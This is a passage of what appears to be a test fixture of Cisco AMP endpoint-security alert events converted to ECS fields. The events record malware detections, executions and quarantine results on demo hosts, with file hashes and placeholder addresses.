Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6508397899087348000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.6A37D750F0-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6508397899087347713", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "@timestamp": "2021-01-14T20:38:26.000Z", + "file": { + "hash": { + "sha256": 
"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:29.843500994Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", + "kind": "alert", + "start": "2021-01-14T20:38:26.000Z", + "action": "Executed malware", + 
"id": "14930696955218", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.E4FCCBFA69-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296272 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "file": { + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843503140Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6412680266518626000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6412680266518626319", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "file": { + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843505081Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6412680266518626000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6412680266518626317", + "event_type_id": 
2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "QuotaGroup.exe", + "pid": 7120, + "hash": { + "sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "md5": "b5ede95ec8bc4ad6984758be42b152bd" + } + }, + "@timestamp": "2021-01-14T20:18:05.000Z", + "file": { + "name": "28242311.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843507024Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6412680266518626000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.E4FCCBFA69-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412680266518626319", + "event_type_id": 
1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "file": { + "name": "QuotaGroup.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "hash": { + "sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "md5": "b5ede95ec8bc4ad6984758be42b152bd" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843508958Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6412680266518626000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.E4FCCBFA69-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412680266518626318", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "28242311.exe", + "pid": 4788, + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "@timestamp": 
"2021-01-14T20:18:05.000Z", + "file": { + "name": "28242311.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843510902Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6412680266518626000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.E4FCCBFA69-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412680266518626317", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": 
"2021-01-14T20:18:05.000Z", + "file": { + "name": "28242311.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "hash": { + "sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "md5": "b5ede95ec8bc4ad6984758be42b152bd" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843512823Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6412680266518626000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.E4FCCBFA69-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6412680266518626316", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "file": { + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "ecs": { + "version": 
"1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843514761Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6412680266518626000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": 
{} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "detection_id": "6412680266518626318", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "file": { + "hash": { + "sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_3" + ], + "hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_3", + "hostname": "Demo_Qakbot_3" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843516637Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6412680266518626000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": 